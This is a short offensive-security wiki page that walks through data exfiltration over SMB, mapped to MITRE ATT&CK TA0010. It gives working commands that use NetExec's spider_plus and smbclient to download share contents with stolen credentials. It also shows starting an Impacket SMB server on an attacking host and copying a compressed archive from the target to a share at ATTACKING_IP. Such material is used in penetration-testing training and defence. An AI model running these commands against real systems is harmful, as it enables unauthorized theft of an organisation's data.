Exfiltration Over SMB

MITRE ATT&CK™ - Exfiltration - Tactic TA0010

Theory

SMB (Server Message Block) exfiltration refers to the unauthorized extraction or transfer of data from a compromised network or system using SMB protocols. Attackers can leverage SMB to transfer sensitive or valuable information from an organization's network to an external location.

Practice

Exfiltrate Share's Content

Tools like NetExec can be used to recursively download a SMB share's content.

netexec smb $IP -u $USERNAME -p $PASSWORD -M spider_plus -o DOWNLOAD_FLAG=True MAX_FILE_SIZE=999999

The previous command generates a json file with the list of accessible files in shares. We may use jq to parse this json output.

cat 10.10.10.111.json | jq '. | map_values(keys)'

Tools like smbclient can be used to recursively download a SMB share's content.

# In an smbclient interactive session
recurse ON
prompt OFF
mget *

Exfiltrate Data

To exfiltrate the data from the target, we can compress the data and transfer it via an SMB shared folder hosted on our attacking host.

First, start a SMB server on your attacking host using smbserver.py from impacket

smbserver.py -smb2support /local/share/path ShareName -user veresk -password psswd

On the target, compress target data

Compress-Archive -Path /path/to/compress -DestinationPath exfi.zip

From the target, mount the share folder and copy files to it

# Mount the smb share
net use Z: \\ATTACKING_IP\ShareName psswd /USER:veresk

# Exfiltrate ZIP file
copy exfi.zip Z:\

Last updated 9 months ago

Was this helpful?